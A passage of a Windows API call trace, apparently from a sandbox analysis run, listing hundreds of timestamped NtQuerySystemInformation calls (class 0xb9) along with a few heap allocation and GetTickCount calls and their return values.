(HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x18) returned 0x27fc9b49240 [0271.258] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.260] GetProcessHeap () returned 0x27fc8db0000 [0271.260] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x230) returned 0x27fc9b4d730 [0271.260] GetProcessHeap () returned 0x27fc8db0000 [0271.260] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x28) returned 0x27fc9f7da50 [0271.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.260] GetProcessHeap () returned 0x27fc8db0000 [0271.260] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0xe0) returned 0x27fc8dbc9e0 [0271.260] GetProcessHeap () returned 0x27fc8db0000 [0271.260] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x18) returned 0x27fc9b49420 [0271.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe7e0, Length=0x50, ResultLength=0x0) [0271.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fed10, Length=0x50, ResultLength=0x0) [0290.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fed10, Length=0x50, ResultLength=0x0) [0290.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fed10, Length=0x50, ResultLength=0x0) [0290.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fec60, Length=0x38, ResultLength=0x0) [0290.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69feba0, Length=0x28, ResultLength=0x0) [0290.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69feab8, Length=0x50, ResultLength=0x0) [0290.976] GetTickCount () returned 0x1188c9e [0290.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe988, Length=0x58, ResultLength=0x0) [0290.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe8a0, Length=0x38, ResultLength=0x0) [0290.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe6d0, Length=0x28, ResultLength=0x0) [0290.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.978] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe6d0, Length=0x28, ResultLength=0x0) [0290.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe6d0, Length=0x28, ResultLength=0x0) [0290.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe6d0, Length=0x28, ResultLength=0x0) [0290.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe740, Length=0x28, ResultLength=0x0) [0290.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe8a0, Length=0x38, ResultLength=0x0) [0290.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe7c0, Length=0x28, ResultLength=0x0) [0290.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe7c0, Length=0x28, ResultLength=0x0) [0290.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe8a0, Length=0x38, ResultLength=0x0) [0290.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe720, Length=0x20, ResultLength=0x0) [0290.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe6a0, Length=0x20, ResultLength=0x0) [0290.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe6a0, Length=0x20, ResultLength=0x0) [0290.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe6a0, Length=0x20, ResultLength=0x0) [0290.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe8a0, Length=0x38, ResultLength=0x0) [0290.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe720, Length=0x20, ResultLength=0x0) [0290.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe6b0, Length=0x20, ResultLength=0x0) [0290.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe6b0, Length=0x20, ResultLength=0x0) [0290.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe988, Length=0x58, ResultLength=0x0) [0290.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe860, Length=0x38, ResultLength=0x0) [0290.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe6a0, Length=0x28, ResultLength=0x0) [0290.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe6a0, Length=0x28, ResultLength=0x0) [0290.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe6a0, Length=0x28, ResultLength=0x0) [0290.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe6a0, Length=0x28, ResultLength=0x0) [0290.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe710, Length=0x28, ResultLength=0x0) [0290.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe860, Length=0x38, ResultLength=0x0) [0290.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe860, Length=0x38, ResultLength=0x0) [0290.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe790, Length=0x28, ResultLength=0x0) [0290.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe790, Length=0x28, ResultLength=0x0) [0290.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe860, Length=0x38, ResultLength=0x0) [0290.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe860, Length=0x38, ResultLength=0x0) [0290.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe600, Length=0x20, ResultLength=0x0) [0290.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe580, Length=0x20, ResultLength=0x0) [0290.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe580, Length=0x20, ResultLength=0x0) [0290.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe580, Length=0x20, ResultLength=0x0) [0290.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe7d0, Length=0x20, ResultLength=0x0) [0290.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe860, Length=0x38, ResultLength=0x0) [0290.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe6f0, Length=0x20, ResultLength=0x0) [0290.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe670, Length=0x20, ResultLength=0x0) [0290.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe670, Length=0x20, ResultLength=0x0) [0290.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe670, Length=0x20, ResultLength=0x0) [0290.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe860, Length=0x38, ResultLength=0x0) [0290.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe6f0, Length=0x20, ResultLength=0x0) [0290.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe670, Length=0x20, ResultLength=0x0) [0290.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe670, Length=0x20, ResultLength=0x0) [0290.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe670, Length=0x20, ResultLength=0x0) [0290.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe860, Length=0x38, ResultLength=0x0) [0290.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe6f0, Length=0x20, ResultLength=0x0) [0290.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe680, Length=0x20, ResultLength=0x0) [0290.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe680, Length=0x20, ResultLength=0x0) [0290.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0290.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe988, Length=0x58, ResultLength=0x0) [0290.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe850, Length=0x58, ResultLength=0x0) [0291.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0291.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe770, Length=0x38, ResultLength=0x0) [0291.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0291.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe5a0, Length=0x28, ResultLength=0x0) [0291.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0291.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0291.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe5a0, Length=0x28, ResultLength=0x0) [0291.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0291.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0291.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe5a0, Length=0x28, ResultLength=0x0) [0291.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0291.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0291.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe5a0, Length=0x28, ResultLength=0x0) [0291.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0291.002] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0291.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe610, Length=0x28, ResultLength=0x0) [0291.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0291.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0291.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe770, Length=0x38, ResultLength=0x0) [0291.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0291.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe690, Length=0x28, ResultLength=0x0) [0295.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe690, Length=0x28, ResultLength=0x0) [0295.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe770, Length=0x38, ResultLength=0x0) [0295.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe5f0, Length=0x20, ResultLength=0x0) [0295.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe570, Length=0x20, ResultLength=0x0) [0295.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe570, Length=0x20, ResultLength=0x0) [0295.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe570, Length=0x20, ResultLength=0x0) [0295.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe770, Length=0x38, ResultLength=0x0) [0295.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe5f0, Length=0x20, ResultLength=0x0) [0295.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe580, Length=0x20, ResultLength=0x0) [0295.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe580, Length=0x20, ResultLength=0x0) [0295.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe850, Length=0x58, ResultLength=0x0) [0295.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe770, Length=0x38, ResultLength=0x0) [0295.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe5a0, Length=0x28, ResultLength=0x0) [0295.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe5a0, Length=0x28, ResultLength=0x0) [0295.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe5a0, Length=0x28, ResultLength=0x0) [0295.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.966] NtQuerySystemInformation 